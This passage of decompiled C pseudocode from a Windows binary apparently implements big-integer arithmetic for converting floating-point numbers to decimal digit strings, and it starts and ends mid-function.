    												__eflags = 0;
    												_t1025 = 0x1cc;
    												_push(0);
    												_v1400 = 0;
    												_v472 = 0;
    												_push( &_v1396);
    												_push(0x1cc);
    												_push( &_v468);
    												L313();
    												_t1237 =  &(_t1237[4]);
    											} else {
    												__eflags = _t966;
    												if(_t966 != 0) {
    													goto L81;
    												} else {
    													_t1078 = 0x72;
    													__eflags = _t1139 - _t1078;
    													if(_t1139 >= _t1078) {
    														_t1139 = _t1078;
    														_v1892 = _t1078;
    													}
    													_t974 = _t1139;
    													_v1880 = _t974;
    													__eflags = _t1139 - 0xffffffff;
    													if(_t1139 != 0xffffffff) {
    														_t1140 = _v1872;
    														_t1229 = _t1139 - _t1140;
    														__eflags = _t1229;
    														_t1082 =  &_v468 + _t1229 * 4;
    														_v1888 = _t1082;
    														while(1) {
    															__eflags = _t974 - _t1140;
    															if(_t974 < _t1140) {
    																break;
    															}
    															__eflags = _t1229 - _t1022;
    															if(_t1229 >= _t1022) {
    																_t1186 = 0;
    																__eflags = 0;
    															} else {
    																_t1186 =  *_t1082;
    															}
    															__eflags = _t1229 - 1 - _t1022;
    															if(_t1229 - 1 >= _t1022) {
    																_t979 = 0;
    																__eflags = 0;
    															} else {
    																_t979 =  *(_t1082 - 4);
    															}
    															_t982 = _v1880;
    															_t1082 = _v1888 - 4;
    															_v1888 = _t1082;
    															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
    															_t974 = _t982 - 1;
    															_t1229 = _t1229 - 1;
    															_v1880 = _t974;
    															__eflags = _t974 - 0xffffffff;
    															if(_t974 != 0xffffffff) {
    																_t1022 = _v472;
    																continue;
    															}
    															break;
    														}
    														_t1139 = _v1892;
    														_t1183 = _v1872;
    														_t1227 = 2;
    													}
    													__eflags = _t1183;
    													if(_t1183 != 0) {
    														__eflags = 0;
    														memset( &_v468, 0, _t1183 << 2);
    														_t1237 =  &(_t1237[3]);
    													}
    													__eflags = _v1865;
    													_t1025 = 0x1cc;
    													if(_v1865 == 0) {
    														_v472 = _t1139;
    													} else {
    														_v472 = _t1139 + 1;
    													}
    												}
    											}
    											_v1392 = _v1392 & 0x00000000;
    											_v1396 = _t1227;
    											_v1400 = 1;
    											_v936 = 1;
    											_push(4);
    										} else {
    											_t1086 = 0;
    											__eflags = 0;
    											while(1) {
    												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
    												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
    													goto L53;
    												}
    												_t1086 = _t1086 + 4;
    												__eflags = _t1086 - 8;
    												if(_t1086 != 8) {
    													continue;
    												} else {
    													_t985 = _v1872 + 2;
    													_t986 = _t985 & 0x0000001f;
    													_t1087 = 0x20;
    													_t1088 = _t1087 - _t986;
    													_v1888 = _t986;
    													_t1231 = _t985 >> 5;
    													_v1876 = _t1231;
    													_v1908 = _t1088;
    													_t989 = E00D7DA00(1, _t1088, 0);
    													_v1896 = _v1896 & 0x00000000;
    													_t990 = _t989 - 1;
    													__eflags = _t990;
    													asm("bsr ecx, edi");
    													_v1884 = _t990;
    													_v1912 =  !_t990;
    													if(_t990 == 0) {
    														_t1089 = 0;
    														__eflags = 0;
    													} else {
    														_t1089 = _t1088 + 1;
    													}
    													_t992 = 0x20;
    													_t993 = _t992 - _t1089;
    													_t1142 = _t1231 + 2;
    													__eflags = _v1888 - _t993;
    													_v1880 = _t1142;
    													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
    													__eflags = _t1142 - 0x73;
    													_v1865 = _t994;
    													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
    													__eflags = _t1142 - 0x73;
    													if(_t1142 != 0x73) {
    														L28:
    														_t995 = 0;
    														__eflags = 0;
    													} else {
    														__eflags = _t994;
    														if(_t994 == 0) {
    															goto L28;
    														} else {
    															_t995 = 1;
    														}
    													}
    													__eflags = _t1090;
    													if(_t1090 != 0) {
    														L50:
    														__eflags = 0;
    														_t1025 = 0x1cc;
    														_push(0);
    														_v1400 = 0;
    														_v472 = 0;
    														_push( &_v1396);
    														_push(0x1cc);
    														_push( &_v468);
    														L313();
    														_t1237 =  &(_t1237[4]);
    													} else {
    														__eflags = _t995;
    														if(_t995 != 0) {
    															goto L50;
    														} else {
    															_t1093 = 0x72;
    															__eflags = _t1142 - _t1093;
    															if(_t1142 >= _t1093) {
    																_t1142 = _t1093;
    																_v1880 = _t1093;
    															}
    															_t1094 = _t1142;
    															_v1892 = _t1094;
    															__eflags = _t1142 - 0xffffffff;
    															if(_t1142 != 0xffffffff) {
    																_t1143 = _v1876;
    																_t1233 = _t1142 - _t1143;
    																__eflags = _t1233;
    																_t1004 =  &_v468 + _t1233 * 4;
    																_v1872 = _t1004;
    																while(1) {
    																	__eflags = _t1094 - _t1143;
    																	if(_t1094 < _t1143) {
    																		break;
    																	}
    																	__eflags = _t1233 - _t1022;
    																	if(_t1233 >= _t1022) {
    																		_t1192 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1192 =  *_t1004;
    																	}
    																	__eflags = _t1233 - 1 - _t1022;
    																	if(_t1233 - 1 >= _t1022) {
    																		_t1006 = 0;
    																		__eflags = 0;
    																	} else {
    																		_t1006 =  *(_v1872 - 4);
    																	}
    																	_t1099 = _v1892;
    																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
    																	_t1094 = _t1099 - 1;
    																	_t1233 = _t1233 - 1;
    																	_t1004 = _v1872 - 4;
    																	_v1892 = _t1094;
    																	_v1872 = _t1004;
    																	__eflags = _t1094 - 0xffffffff;
    																	if(_t1094 != 0xffffffff) {
    																		_t1022 = _v472;
    																		continue;
    																	}
    																	break;
    																}
    																_t1142 = _v1880;
    																_t1231 = _v1876;
    															}
    															__eflags = _t1231;
    															if(_t1231 != 0) {
    																__eflags = 0;
    																memset( &_v468, 0, _t1231 << 2);
    																_t1237 =  &(_t1237[3]);
    															}
    															__eflags = _v1865;
    															_t1025 = 0x1cc;
    															if(_v1865 == 0) {
    																_v472 = _t1142;
    															} else {
    																_v472 = _t1142 + 1;
    															}
    														}
    													}
    													_v1392 = _v1392 & 0x00000000;
    													_t999 = 4;
    													__eflags = 1;
    													_v1396 = _t999;
    													_v1400 = 1;
    													_v936 = 1;
    													_push(_t999);
    												}
    												goto L52;
    											}
    											goto L53;
    										}
    										L52:
    										_push( &_v1396);
    										_push(_t1025);
    										_push( &_v932);
    										L313();
    										_t1241 =  &(_t1237[4]);
    									}
    									_t782 = _v1904;
    									_t1043 = 0xa;
    									_v1912 = _t1043;
    									__eflags = _t782;
    									if(_t782 < 0) {
    										_t783 =  ~_t782;
    										_t784 = _t783 / _t1043;
    										_v1880 = _t784;
    										_t1044 = _t783 % _t1043;
    										_v1884 = _t1044;
    										__eflags = _t784;
    										if(_t784 == 0) {
    											L249:
    											__eflags = _t1044;
    											if(_t1044 != 0) {
    												_t820 =  *(0xd81dbc + _t1044 * 4);
    												_v1896 = _t820;
    												__eflags = _t820;
    												if(_t820 == 0) {
    													L260:
    													__eflags = 0;
    													_push(0);
    													_v472 = 0;
    													_v2408 = 0;
    													goto L261;
    												} else {
    													__eflags = _t820 - 1;
    													if(_t820 != 1) {
    														_t1055 = _v472;
    														__eflags = _t1055;
    														if(_t1055 != 0) {
    															_t1161 = 0;
    															_t1213 = 0;
    															__eflags = 0;
    															do {
    																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
    																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
    																_t820 = _v1896;
    																asm("adc edx, 0x0");
    																_t1213 = _t1213 + 1;
    																_t1161 = _t1113;
    																__eflags = _t1213 - _t1055;
    															} while (_t1213 != _t1055);
    															__eflags = _t1161;
    															if(_t1161 != 0) {
    																_t826 = _v472;
    																__eflags = _t826 - 0x73;
    																if(_t826 >= 0x73) {
    																	goto L260;
    																} else {
    																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
    																	_v472 = _v472 + 1;
    																}
    															}
    														}
    													}
    												}
    											}
    										} else {
    											do {
    												__eflags = _t784 - 0x26;
    												if(_t784 > 0x26) {
    													_t784 = 0x26;
    												}
    												_t1056 =  *(0xd81d26 + _t784 * 4) & 0x000000ff;
    												_v1872 = _t784;
    												_v1400 = ( *(0xd81d26 + _t784 * 4) & 0x000000ff) + ( *(0xd81d27 + _t784 * 4) & 0x000000ff);
    												E00D6D520(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
    												_t837 = E00D7DAE0( &(( &_v1396)[_t1056]), 0xd81420 + ( *(0xd81d24 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xd81d27 + _t784 * 4) & 0x000000ff) << 2);
    												_t1057 = _v1400;
    												_t1241 =  &(_t1241[6]);
    												_v1892 = _t1057;
    												__eflags = _t1057 - 1;
    												if(_t1057 > 1) {
    													__eflags = _v472 - 1;
    													if(_v472 > 1) {
    														__eflags = _t1057 - _v472;
    														_t1164 =  &_v1396;
    														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
    														__eflags = _t838;
    														if(_t838 != 0) {
    															_t1114 =  &_v468;
    														} else {
    															_t1164 =  &_v468;
    															_t1114 =  &_v1396;
    														}
    														_v1908 = _t1114;
    														__eflags = _t838;
    														if(_t838 == 0) {
    															_t1057 = _v472;
    														}
    														_v1876 = _t1057;
    														__eflags = _t838;
    														if(_t838 != 0) {
    															_v1892 = _v472;
    														}
    														_t1115 = 0;
    														_t1215 = 0;
    														_v1864 = 0;
    														__eflags = _t1057;
    														if(_t1057 == 0) {
    															L243:
    															_v472 = _t1115;
    															_t840 = _t1115 << 2;
    															__eflags = _t840;
    															_push(_t840);
    															_t841 =  &_v1860;
    															goto L244;
    														} else {
    															_t1165 = _t1164 -  &_v1860;
    															__eflags = _t1165;
    															_v1928 = _t1165;
    															do {
    																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
    																_v1896 = _t847;
    																__eflags = _t847;
    																if(_t847 != 0) {
    																	_t848 = 0;
    																	_t1166 = 0;
    																	_t1058 = _t1215;
    																	_v1888 = 0;
    																	__eflags = _v1892;
    																	if(_v1892 == 0) {
    																		L240:
    																		__eflags = _t1058 - 0x73;
    																		if(_t1058 == 0x73) {
    																			goto L258;
    																		} else {
    																			_t1165 = _v1928;
    																			_t1057 = _v1876;
    																			goto L242;
    																		}
    																	} else {
    																		while(1) {
    																			__eflags = _t1058 - 0x73;
    																			if(_t1058 == 0x73) {
    																				goto L235;
    																			}
    																			__eflags = _t1058 - _t1115;
    																			if(_t1058 == _t1115) {
    																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
    																				_t859 = _t848 + 1 + _t1215;
    																				__eflags = _t859;
    																				_v1864 = _t859;
    																				_t848 = _v1888;
    																			}
    																			_t854 =  *(_v1908 + _t848 * 4);
    																			asm("adc edx, 0x0");
    																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
    																			asm("adc edx, 0x0");
    																			_t848 = _v1888 + 1;
    																			_t1058 = _t1058 + 1;
    																			_v1888 = _t848;
    																			_t1166 = _t854 * _v1896 >> 0x20;
    																			_t1115 = _v1864;
    																			__eflags = _t848 - _v1892;
    																			if(_t848 != _v1892) {
    																				continue;
    																			} else {
    																				goto L235;
    																			}
    																			while(1) {
    																				L235:
    																				__eflags = _t1166;
    																				if(_t1166 == 0) {
    																					goto L240;
    																				}
    																				__eflags = _t1058 - 0x73;
    																				if(_t1058 == 0x73) {
    																					goto L258;
    																				} else {
    																					__eflags = _t1058 - _t1115;
    																					if(_t1058 == _t1115) {
    																						_t558 = _t1235 + _t1058 * 4 - 0x740;
    																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
    																						__eflags =  *_t558;
    																						_t564 = _t1058 + 1; // 0x1
    																						_v1864 = _t564;
    																					}
    																					_t852 = _t1166;
    																					_t1166 = 0;
    																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
    																					_t1115 = _v1864;
    																					asm("adc edi, edi");
    																					_t1058 = _t1058 + 1;
    																					continue;
    																				}
    																				goto L246;
    																			}
    																			goto L240;
    																		}
    																		goto L235;
    																	}
    																} else {
    																	__eflags = _t1215 - _t1115;
    																	if(_t1215 == _t1115) {
    																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
    																		_t526 = _t1215 + 1; // 0x1
    																		_t1115 = _t526;
    																		_v1864 = _t1115;
    																	}
    																	goto L242;
    																}
    																goto L246;
    																L242:
    																_t1215 = _t1215 + 1;
    																__eflags = _t1215 - _t1057;
    															} while (_t1215 != _t1057);
    															goto L243;
    														}
    													} else {
    														_t1167 = _v468;
    														_push(_t1057 << 2);
    														_v472 = _t1057;
    														_push( &_v1396);
    														_push(_t1025);
    														_push( &_v468);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														__eflags = _t1167;
    														if(_t1167 == 0) {
    															goto L203;
    														} else {
    															__eflags = _t1167 - 1;
    															if(_t1167 == 1) {
    																goto L245;
    															} else {
    																__eflags = _v472;
    																if(_v472 == 0) {
    																	goto L245;
    																} else {
    																	_t1059 = 0;
    																	_v1896 = _v472;
    																	_t1216 = 0;
    																	__eflags = 0;
    																	do {
    																		_t867 = _t1167;
    																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
    																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
    																		asm("adc edx, 0x0");
    																		_t1216 = _t1216 + 1;
    																		_t1059 = _t1116;
    																		__eflags = _t1216 - _v1896;
    																	} while (_t1216 != _v1896);
    																	goto L208;
    																}
    															}
    														}
    													}
    												} else {
    													_t1168 = _v1396;
    													__eflags = _t1168;
    													if(_t1168 != 0) {
    														__eflags = _t1168 - 1;
    														if(_t1168 == 1) {
    															goto L245;
    														} else {
    															__eflags = _v472;
    															if(_v472 == 0) {
    																goto L245;
    															} else {
    																_t1060 = 0;
    																_v1896 = _v472;
    																_t1217 = 0;
    																__eflags = 0;
    																do {
    																	_t872 = _t1168;
    																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
    																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
    																	asm("adc edx, 0x0");
    																	_t1217 = _t1217 + 1;
    																	_t1060 = _t1117;
    																	__eflags = _t1217 - _v1896;
    																} while (_t1217 != _v1896);
    																L208:
    																__eflags = _t1059;
    																if(_t1059 == 0) {
    																	goto L245;
    																} else {
    																	_t870 = _v472;
    																	__eflags = _t870 - 0x73;
    																	if(_t870 >= 0x73) {
    																		L258:
    																		_push(0);
    																		_v2408 = 0;
    																		_v472 = 0;
    																		_push( &_v2404);
    																		_push(_t1025);
    																		_push( &_v468);
    																		L313();
    																		_t1241 =  &(_t1241[4]);
    																		_t843 = 0;
    																	} else {
    																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
    																		_v472 = _v472 + 1;
    																		goto L245;
    																	}
    																}
    															}
    														}
    													} else {
    														L203:
    														_v2408 = 0;
    														_v472 = 0;
    														_push(0);
    														_t841 =  &_v2404;
    														L244:
    														_push(_t841);
    														_push(_t1025);
    														_push( &_v468);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														L245:
    														_t843 = 1;
    													}
    												}
    												L246:
    												__eflags = _t843;
    												if(_t843 == 0) {
    													_v2408 = _v2408 & 0x00000000;
    													_v472 = _v472 & 0x00000000;
    													_push(0);
    													L261:
    													_push( &_v2404);
    													_t823 =  &_v468;
    													goto L262;
    												} else {
    													goto L247;
    												}
    												goto L263;
    												L247:
    												_t784 = _v1880 - _v1872;
    												__eflags = _t784;
    												_v1880 = _t784;
    											} while (_t784 != 0);
    											_t1044 = _v1884;
    											goto L249;
    										}
    									} else {
    										_t875 = _t782 / _t1043;
    										_v1908 = _t875;
    										_t1061 = _t782 % _t1043;
    										_v1896 = _t1061;
    										__eflags = _t875;
    										if(_t875 == 0) {
    											L184:
    											__eflags = _t1061;
    											if(_t1061 != 0) {
    												_t1169 =  *(0xd81dbc + _t1061 * 4);
    												__eflags = _t1169;
    												if(_t1169 != 0) {
    													__eflags = _t1169 - 1;
    													if(_t1169 != 1) {
    														_t876 = _v936;
    														_v1896 = _t876;
    														__eflags = _t876;
    														if(_t876 != 0) {
    															_t1218 = 0;
    															_t1062 = 0;
    															__eflags = 0;
    															do {
    																_t877 = _t1169;
    																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
    																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
    																asm("adc edx, 0x0");
    																_t1062 = _t1062 + 1;
    																_t1218 = _t1121;
    																__eflags = _t1062 - _v1896;
    															} while (_t1062 != _v1896);
    															__eflags = _t1218;
    															if(_t1218 != 0) {
    																_t880 = _v936;
    																__eflags = _t880 - 0x73;
    																if(_t880 >= 0x73) {
    																	goto L186;
    																} else {
    																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
    																	_v936 = _v936 + 1;
    																}
    															}
    														}
    													}
    												} else {
    													L186:
    													_v2408 = 0;
    													_v936 = 0;
    													_push(0);
    													goto L190;
    												}
    											}
    										} else {
    											do {
    												__eflags = _t875 - 0x26;
    												if(_t875 > 0x26) {
    													_t875 = 0x26;
    												}
    												_t1063 =  *(0xd81d26 + _t875 * 4) & 0x000000ff;
    												_v1888 = _t875;
    												_v1400 = ( *(0xd81d26 + _t875 * 4) & 0x000000ff) + ( *(0xd81d27 + _t875 * 4) & 0x000000ff);
    												E00D6D520(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
    												_t893 = E00D7DAE0( &(( &_v1396)[_t1063]), 0xd81420 + ( *(0xd81d24 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xd81d27 + _t875 * 4) & 0x000000ff) << 2);
    												_t1064 = _v1400;
    												_t1241 =  &(_t1241[6]);
    												_v1892 = _t1064;
    												__eflags = _t1064 - 1;
    												if(_t1064 > 1) {
    													__eflags = _v936 - 1;
    													if(_v936 > 1) {
    														__eflags = _t1064 - _v936;
    														_t1172 =  &_v1396;
    														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
    														__eflags = _t894;
    														if(_t894 != 0) {
    															_t1122 =  &_v932;
    														} else {
    															_t1172 =  &_v932;
    															_t1122 =  &_v1396;
    														}
    														_v1876 = _t1122;
    														__eflags = _t894;
    														if(_t894 == 0) {
    															_t1064 = _v936;
    														}
    														_v1880 = _t1064;
    														__eflags = _t894;
    														if(_t894 != 0) {
    															_v1892 = _v936;
    														}
    														_t1123 = 0;
    														_t1220 = 0;
    														_v1864 = 0;
    														__eflags = _t1064;
    														if(_t1064 == 0) {
    															L177:
    															_v936 = _t1123;
    															_t896 = _t1123 << 2;
    															__eflags = _t896;
    															goto L178;
    														} else {
    															_t1173 = _t1172 -  &_v1860;
    															__eflags = _t1173;
    															_v1928 = _t1173;
    															do {
    																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
    																_v1884 = _t903;
    																__eflags = _t903;
    																if(_t903 != 0) {
    																	_t904 = 0;
    																	_t1174 = 0;
    																	_t1065 = _t1220;
    																	_v1872 = 0;
    																	__eflags = _v1892;
    																	if(_v1892 == 0) {
    																		L174:
    																		__eflags = _t1065 - 0x73;
    																		if(_t1065 == 0x73) {
    																			goto L187;
    																		} else {
    																			_t1173 = _v1928;
    																			_t1064 = _v1880;
    																			goto L176;
    																		}
    																	} else {
    																		while(1) {
    																			__eflags = _t1065 - 0x73;
    																			if(_t1065 == 0x73) {
    																				goto L169;
    																			}
    																			__eflags = _t1065 - _t1123;
    																			if(_t1065 == _t1123) {
    																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
    																				_t915 = _t904 + 1 + _t1220;
    																				__eflags = _t915;
    																				_v1864 = _t915;
    																				_t904 = _v1872;
    																			}
    																			_t910 =  *(_v1876 + _t904 * 4);
    																			asm("adc edx, 0x0");
    																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
    																			asm("adc edx, 0x0");
    																			_t904 = _v1872 + 1;
    																			_t1065 = _t1065 + 1;
    																			_v1872 = _t904;
    																			_t1174 = _t910 * _v1884 >> 0x20;
    																			_t1123 = _v1864;
    																			__eflags = _t904 - _v1892;
    																			if(_t904 != _v1892) {
    																				continue;
    																			} else {
    																				goto L169;
    																			}
    																			while(1) {
    																				L169:
    																				__eflags = _t1174;
    																				if(_t1174 == 0) {
    																					goto L174;
    																				}
    																				__eflags = _t1065 - 0x73;
    																				if(_t1065 == 0x73) {
    																					L187:
    																					__eflags = 0;
    																					_v2408 = 0;
    																					_v936 = 0;
    																					_push(0);
    																					_t906 =  &_v2404;
    																					goto L188;
    																				} else {
    																					__eflags = _t1065 - _t1123;
    																					if(_t1065 == _t1123) {
    																						_t370 = _t1235 + _t1065 * 4 - 0x740;
    																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
    																						__eflags =  *_t370;
    																						_t376 = _t1065 + 1; // 0x1
    																						_v1864 = _t376;
    																					}
    																					_t908 = _t1174;
    																					_t1174 = 0;
    																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
    																					_t1123 = _v1864;
    																					asm("adc edi, edi");
    																					_t1065 = _t1065 + 1;
    																					continue;
    																				}
    																				goto L181;
    																			}
    																			goto L174;
    																		}
    																		goto L169;
    																	}
    																} else {
    																	__eflags = _t1220 - _t1123;
    																	if(_t1220 == _t1123) {
    																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
    																		_t338 = _t1220 + 1; // 0x1
    																		_t1123 = _t338;
    																		_v1864 = _t1123;
    																	}
    																	goto L176;
    																}
    																goto L181;
    																L176:
    																_t1220 = _t1220 + 1;
    																__eflags = _t1220 - _t1064;
    															} while (_t1220 != _t1064);
    															goto L177;
    														}
    													} else {
    														_t1175 = _v932;
    														_push(_t1064 << 2);
    														_v936 = _t1064;
    														_push( &_v1396);
    														_push(_t1025);
    														_push( &_v932);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														__eflags = _t1175;
    														if(_t1175 != 0) {
    															__eflags = _t1175 - 1;
    															if(_t1175 == 1) {
    																goto L180;
    															} else {
    																__eflags = _v936;
    																if(_v936 == 0) {
    																	goto L180;
    																} else {
    																	_t1066 = 0;
    																	_v1884 = _v936;
    																	_t1221 = 0;
    																	__eflags = 0;
    																	do {
    																		_t922 = _t1175;
    																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
    																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
    																		asm("adc edx, 0x0");
    																		_t1221 = _t1221 + 1;
    																		_t1066 = _t1124;
    																		__eflags = _t1221 - _v1884;
    																	} while (_t1221 != _v1884);
    																	goto L149;
    																}
    															}
    														} else {
    															_v1400 = 0;
    															_v936 = 0;
    															_push(0);
    															_t897 =  &_v1396;
    															goto L179;
    														}
    													}
    												} else {
    													_t1176 = _v1396;
    													__eflags = _t1176;
    													if(_t1176 != 0) {
    														__eflags = _t1176 - 1;
    														if(_t1176 == 1) {
    															goto L180;
    														} else {
    															__eflags = _v936;
    															if(_v936 == 0) {
    																goto L180;
    															} else {
    																_t1067 = 0;
    																_v1884 = _v936;
    																_t1222 = 0;
    																__eflags = 0;
    																do {
    																	_t929 = _t1176;
    																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
    																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
    																	asm("adc edx, 0x0");
    																	_t1222 = _t1222 + 1;
    																	_t1067 = _t1125;
    																	__eflags = _t1222 - _v1884;
    																} while (_t1222 != _v1884);
    																L149:
    																__eflags = _t1066;
    																if(_t1066 == 0) {
    																	goto L180;
    																} else {
    																	_t925 = _v936;
    																	__eflags = _t925 - 0x73;
    																	if(_t925 < 0x73) {
    																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
    																		_v936 = _v936 + 1;
    																		goto L180;
    																	} else {
    																		_v1400 = 0;
    																		_v936 = 0;
    																		_push(0);
    																		_t906 =  &_v1396;
    																		L188:
    																		_push(_t906);
    																		_push(_t1025);
    																		_push( &_v932);
    																		L313();
    																		_t1241 =  &(_t1241[4]);
    																		_t899 = 0;
    																	}
    																}
    															}
    														}
    													} else {
    														_t896 = 0;
    														_v1864 = 0;
    														_v936 = 0;
    														L178:
    														_push(_t896);
    														_t897 =  &_v1860;
    														L179:
    														_push(_t897);
    														_push(_t1025);
    														_push( &_v932);
    														L313();
    														_t1241 =  &(_t1241[4]);
    														L180:
    														_t899 = 1;
    													}
    												}
    												L181:
    												__eflags = _t899;
    												if(_t899 == 0) {
    													_v2408 = _v2408 & 0x00000000;
    													_t404 =  &_v936;
    													 *_t404 = _v936 & 0x00000000;
    													__eflags =  *_t404;
    													_push(0);
    													L190:
    													_push( &_v2404);
    													_t823 =  &_v932;
    													L262:
    													_push(_t1025);
    													_push(_t823);
    													L313();
    													_t1241 =  &(_t1241[4]);
    												} else {
    													goto L182;
    												}
    												goto L263;
    												L182:
    												_t875 = _v1908 - _v1888;
    												__eflags = _t875;
    												_v1908 = _t875;
    											} while (_t875 != 0);
    											_t1061 = _v1896;
    											goto L184;
    										}
    									}
    									L263:
    									_t1156 = _v1920;
    									_t1208 = _t1156;
    									_t1045 = _v472;
    									_v1872 = _t1208;
    									__eflags = _t1045;
    									if(_t1045 != 0) {
    										_t1212 = 0;
    										_t1160 = 0;
    										__eflags = 0;
    										do {
    											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
    											_t1111 = 0xa;
    											_t1112 = _t813 * _t1111 >> 0x20;
    											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
    											asm("adc edx, 0x0");
    											_t1160 = _t1160 + 1;
    											_t1212 = _t1112;
    											__eflags = _t1160 - _t1045;
    										} while (_t1160 != _t1045);
    										_v1896 = _t1212;
    										__eflags = _t1212;
    										_t1208 = _v1872;
    										if(_t1212 != 0) {
    											_t1054 = _v472;
    											__eflags = _t1054 - 0x73;
    											if(_t1054 >= 0x73) {
    												__eflags = 0;
    												_push(0);
    												_v2408 = 0;
    												_v472 = 0;
    												_push( &_v2404);
    												_push(_t1025);
    												_push( &_v468);
    												L313();
    												_t1241 =  &(_t1241[4]);
    											} else {
    												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
    												_v472 = _v472 + 1;
    											}
    										}
    										_t1156 = _t1208;
    									}
    									_t787 = E00D793F0( &_v472,  &_v936);
    									_t1104 = 0xa;
    									__eflags = _t787 - _t1104;
    									if(_t787 != _t1104) {
    										__eflags = _t787;
    										if(_t787 != 0) {
    											_t788 = _t787 + 0x30;
    											__eflags = _t788;
    											_t1208 = _t1156 + 1;
    											 *_t1156 = _t788;
    											_v1872 = _t1208;
    											goto L282;
    										} else {
    											_t789 = _v1904 - 1;
    										}
    									} else {
    										_v1904 = _v1904 + 1;
    										_t1208 = _t1156 + 1;
    										_t805 = _v936;
    										 *_t1156 = 0x31;
    										_v1872 = _t1208;
    										__eflags = _t805;
    										if(_t805 != 0) {
    											_t1159 = 0;
    											_t1211 = _t805;
    											_t1053 = 0;
    											__eflags = 0;
    											do {
    												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
    												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
    												asm("adc edx, 0x0");
    												_t1053 = _t1053 + 1;
    												_t1159 = _t806 * _t1104 >> 0x20;
    												_t1104 = 0xa;
    												__eflags = _t1053 - _t1211;
    											} while (_t1053 != _t1211);
    											_t1208 = _v1872;
    											__eflags = _t1159;
    											if(_t1159 != 0) {
    												_t809 = _v936;
    												__eflags = _t809 - 0x73;
    												if(_t809 >= 0x73) {
    													_push(0);
    													_v2408 = 0;
    													_v936 = 0;
    													_push( &_v2404);
    													_push(_t1025);
    													_push( &_v932);
    													L313();
    													_t1241 =  &(_t1241[4]);
    												} else {
    													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
    													_v936 = _v936 + 1;
    												}
    											}
    										}
    										L282:
    										_t789 = _v1904;
    									}
    									 *((intOrPtr*)(_v1924 + 4)) = _t789;
    									_t1031 = _v1916;
    									__eflags = _t789;
    									if(_t789 >= 0) {
    										__eflags = _t1031 - 0x7fffffff;
    										if(_t1031 <= 0x7fffffff) {
    											_t1031 = _t1031 + _t789;
    											__eflags = _t1031;
    										}
    									}
    									_t791 = _a24 - 1;
    									__eflags = _t791 - _t1031;
    									if(_t791 >= _t1031) {
    										_t791 = _t1031;
    									}
    									_t792 = _t791 + _v1920;
    									_v1916 = _t792;
    									__eflags = _t1208 - _t792;
    									if(__eflags != 0) {
